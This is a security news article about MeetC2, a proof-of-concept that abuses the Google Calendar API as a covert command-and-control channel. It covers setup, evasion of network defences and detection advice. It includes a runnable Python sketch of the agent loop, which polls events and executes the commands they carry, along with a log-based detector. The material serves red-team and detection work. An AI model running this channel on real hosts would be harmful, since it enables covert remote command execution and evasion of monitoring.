Hackers Exploit Google Calendar API with Serverless MeetC2 Framework

A newly released proof-of-concept demonstrates a serverless command-and-control (C2) technique that abuses the Google Calendar API to hide malicious traffic inside a trusted cloud service.

Dubbed MeetC2, this lightweight, cross-platform proof-of-concept shows how adversaries can blend C2 communications into everyday SaaS usage, creating new detection, telemetry, and response challenges for red and blue teams alike.

In a recent internal purple-team exercise, security engineers observed how easily traffic to familiar Google domains slipped past traditional network defenses.

By crafting a minimal "organizer" agent and "guest" agent that use only standard Calendar API endpoints, an attacker can issue commands and receive responses entirely inside legitimate HTTPS requests to oauth2.googleapis.com (the OAuth token exchange) and www.googleapis.com (the Calendar API itself), domains that are normally allow-listed in corporate environments.

The guest agent polls the Google Calendar "events" endpoint every 30 seconds, quietly checking for new entries.

The organizer agent, run from an attacker-controlled host, places a command in the "summary" field of a newly created event, formatted as "Meeting from nobody: [COMMAND]".

When the guest agent retrieves and executes that command, it writes the output back into the same event's "description" field with a PUT request, wrapped in an [OUTPUT]…[/OUTPUT] block.

Because every exchange is routed through Google's own API endpoints, the method needs no attacker-owned server infrastructure and leaves a minimal network footprint.
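The following Python is an added illustration of the organizer/guest exchange described above; it is not the MeetC2 project's own code (the article does not state the PoC's implementation language). It runs offline against an in-memory stand-in for the shared calendar's events collection: the FakeCalendar class, the Event dataclass and the run_shell executor are assumptions of this example, while the "Meeting from nobody: " summary prefix, the [OUTPUT]…[/OUTPUT] reply framing and the 30-second poll are the ones the article describes.

```python
import re
import subprocess
import time
from dataclasses import dataclass, field

# Framing described in the article: the organizer writes the command into an
# event's summary, the guest writes the result into the same event's description.
COMMAND_PREFIX = "Meeting from nobody: "
OUTPUT_RE = re.compile(r"\[OUTPUT\](.*?)\[/OUTPUT\]", re.DOTALL)


@dataclass
class Event:
    """Minimal stand-in for a Google Calendar event resource (assumed shape)."""
    id: str
    summary: str
    description: str = ""


@dataclass
class FakeCalendar:
    """In-memory stand-in for one shared calendar's events collection.
    The real PoC issues these calls to www.googleapis.com; this model only
    mirrors the three operations the channel needs."""
    events: dict = field(default_factory=dict)
    _next: int = 0

    def insert(self, summary):                     # events.insert (POST)
        self._next += 1
        ev = Event(id=f"evt{self._next}", summary=summary)
        self.events[ev.id] = ev
        return ev

    def list(self):                                # events.list (GET)
        return list(self.events.values())

    def update(self, event_id, description):       # events.update (PUT)
        self.events[event_id].description = description
        return self.events[event_id]


def parse_command(summary):
    """Return the command carried by an event summary, or None for a normal event."""
    if summary.startswith(COMMAND_PREFIX):
        return summary[len(COMMAND_PREFIX):]
    return None


def organizer_send(cal, command):
    """Organizer side: queue a command by creating a tasking event."""
    return cal.insert(COMMAND_PREFIX + command).id


def organizer_collect(cal, event_id):
    """Organizer side: read the guest's output block, or None if unanswered."""
    m = OUTPUT_RE.search(cal.events[event_id].description)
    return m.group(1) if m else None


def run_shell(command):
    """Default executor: runs the command on the host, as the guest agent would."""
    proc = subprocess.run(command, shell=True, capture_output=True, text=True)
    return proc.stdout + proc.stderr


def guest_poll_once(cal, executor=run_shell):
    """Guest side, one polling iteration: execute every unanswered tasking event
    and PUT the result back into it. Returns the ids handled this round."""
    handled = []
    for ev in cal.list():
        cmd = parse_command(ev.summary)
        if cmd is None or OUTPUT_RE.search(ev.description):
            continue  # not a tasking event, or already answered
        cal.update(ev.id, f"[OUTPUT]{executor(cmd)}[/OUTPUT]")
        handled.append(ev.id)
    return handled


def guest_loop(cal, interval=30, executor=run_shell):
    """The 30-second polling loop the article describes (never returns)."""
    while True:
        guest_poll_once(cal, executor)
        time.sleep(interval)


if __name__ == "__main__":
    cal = FakeCalendar()
    eid = organizer_send(cal, "whoami")
    guest_poll_once(cal)
    print(organizer_collect(cal, eid))
```

Note that the guest never deletes the event: it marks work as done only by the presence of the [OUTPUT] block, so every command and its result remain visible in the calendar (the attacker's view shown in the screenshot below), which is exactly the artifact a defender can search for.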

Setting up MeetC2 takes only a few steps in the Google Cloud Console: enable the Calendar API for a project, create a service account and download its JSON key, then share a dedicated calendar with the service account's email address, granting it permission to make changes to events. The agents' ability to read and modify events comes from that calendar-sharing setting, not from any IAM role.

With the downloaded JSON key renamed to credentials.json, a single build script compiles both the organizer and the guest binary.

Operators then run the organizer binary against the target calendar ID, while the guest binary polls silently on the compromised hosts.

In practical tests, MeetC2 executed commands such as whoami and uname -a, as well as further reconnaissance, without triggering standard data-loss-prevention or intrusion-prevention systems.

Because the API calls look like legitimate calendar synchronization traffic, they blend into both client-side and server-side logs and evade signature-based detection. The low traffic volume and the absence of unusual DNS lookups (only Google domains are ever resolved) further complicate detection.

Blue teams can replicate MeetC2 in controlled environments to validate their cloud-abuse detection capabilities.

This proof-of-concept draws inspiration from the earlier "GC2-sheet" implementation (C2 over Google Sheets) but refines OpSec considerations and streamlines cross-platform support.

Attacker view in Google Calendar.

By collecting the logs available for Calendar API access, teams can monitor for unusual patterns, such as high-frequency event creation and updates from a single service account, or one identity both creating an event and modifying it seconds later.

Using Google Cloud Audit Logs to flag repetitive Calendar API calls, or inspecting event payloads for suspicious summary or description content (such as the fixed "Meeting from nobody:" prefix or [OUTPUT] markers), can surface the covert channel.

Additionally, third-party app governance tools should enforce tighter restrictions on service-account permissions and alert on calendar-sharing changes, since the channel depends on a calendar being shared with an attacker-controlled service account.
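To make the detection guidance above concrete, here is an added example, not from the article or the MeetC2 project, that runs both checks over constructed sample records: a sliding-window count of event insert/update calls per principal, and a content match on the summary and description fields for the framing markers described earlier. The record shape (ts, principal, method, summary, description), the service-account name, and the thresholds are simplifications assumed for this example, not the real Google Cloud Audit Log or Workspace Calendar audit schema.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

TS_FMT = "%Y-%m-%dT%H:%M:%SZ"
WRITE_METHODS = {"calendar.events.insert", "calendar.events.update"}

# Markers of the MeetC2 framing described in the article.
SUSPICIOUS_PATTERNS = [
    re.compile(r"^Meeting from nobody: "),               # organizer tasking in the summary
    re.compile(r"\[OUTPUT\].*?\[/OUTPUT\]", re.DOTALL),  # guest reply in the description
]

SERVICE_ACCOUNT = "sync-bot@proj-123.iam.gserviceaccount.com"  # assumed name


def _build_sample_log():
    """Constructed sample records (assumed simplified schema, not Google's):
    one service account tasks four commands one minute apart, each as an
    insert followed 30 s later by the guest's update. Two ordinary writes by
    a human user are mixed in as benign noise."""
    t0 = datetime(2025, 9, 1, 10, 0, 0)
    recs = []
    for i, cmd in enumerate(["whoami", "uname -a", "id", "hostname"]):
        t = t0 + timedelta(minutes=i)
        recs.append({"ts": t.strftime(TS_FMT), "principal": SERVICE_ACCOUNT,
                     "method": "calendar.events.insert",
                     "summary": f"Meeting from nobody: {cmd}", "description": ""})
        recs.append({"ts": (t + timedelta(seconds=30)).strftime(TS_FMT),
                     "principal": SERVICE_ACCOUNT,
                     "method": "calendar.events.update",
                     "summary": f"Meeting from nobody: {cmd}",
                     "description": f"[OUTPUT]result of {cmd}\n[/OUTPUT]"})
    for minute, desc in ((1, "Agenda: roadmap"), (2, "Agenda: roadmap, hiring")):
        recs.append({"ts": (t0 + timedelta(minutes=minute)).strftime(TS_FMT),
                     "principal": "alice@example.com",
                     "method": "calendar.events.update",
                     "summary": "1:1 with Bob", "description": desc})
    return sorted(recs, key=lambda r: r["ts"])


SAMPLE_LOG = _build_sample_log()


def is_service_account(principal):
    """Google service-account identities end in .iam.gserviceaccount.com."""
    return principal.endswith(".iam.gserviceaccount.com")


def content_hits(records):
    """Records whose summary or description carries a MeetC2 framing marker."""
    return [r for r in records
            if any(p.search(r["summary"]) or p.search(r["description"])
                   for p in SUSPICIOUS_PATTERNS)]


def rate_hits(records, window=timedelta(minutes=5), threshold=5):
    """Principals whose event writes exceed `threshold` inside any sliding
    `window`; returns {principal: peak count}. A human rarely writes to a
    calendar several times a minute; a polling beacon does."""
    by_principal = defaultdict(list)
    for r in records:
        if r["method"] in WRITE_METHODS:
            by_principal[r["principal"]].append(datetime.strptime(r["ts"], TS_FMT))
    flagged = {}
    for principal, times in by_principal.items():
        times.sort()
        lo, peak = 0, 0
        for hi in range(len(times)):
            while times[hi] - times[lo] > window:
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak > threshold:
            flagged[principal] = peak
    return flagged


def triage(records):
    """Combine both signals into a sorted list of reasons per principal."""
    verdicts = defaultdict(set)
    for r in content_hits(records):
        verdicts[r["principal"]].add("c2-framing")
    for principal in rate_hits(records):
        verdicts[principal].add("high-write-rate")
    for principal in verdicts:
        if is_service_account(principal):
            verdicts[principal].add("service-account")
    return {p: sorted(v) for p, v in verdicts.items()}


if __name__ == "__main__":
    for principal, reasons in triage(SAMPLE_LOG).items():
        print(principal, reasons)
```

The content match is the cheap, high-confidence signal but only catches this PoC's fixed framing; the rate check is what survives a trivial change of prefix, so in practice both should be kept, with the rate threshold tuned against a baseline of the organization's real calendar write volume per identity.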

The MeetC2 project is open-source and available on GitHub, offering defenders an actionable platform to test responses to cloud-native C2 operations.

The developers caution that, while functional, the tool could be improved further by hardening the guest binary against endpoint forensics and strengthening its operational security.

As adversaries continue to innovate with serverless and cloud-based C2 approaches, security teams must shift from perimeter-focused defenses to deeper, service-level telemetry and anomaly detection.

Demonstrations like MeetC2 underscore the importance of visibility within trusted SaaS domains and the need for adaptive defenses that inspect both metadata and payload content.

By exercising detection rules and response playbooks against controlled cloud-abuse scenarios, organizations can stay ahead of evolving threats hiding in plain sight.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.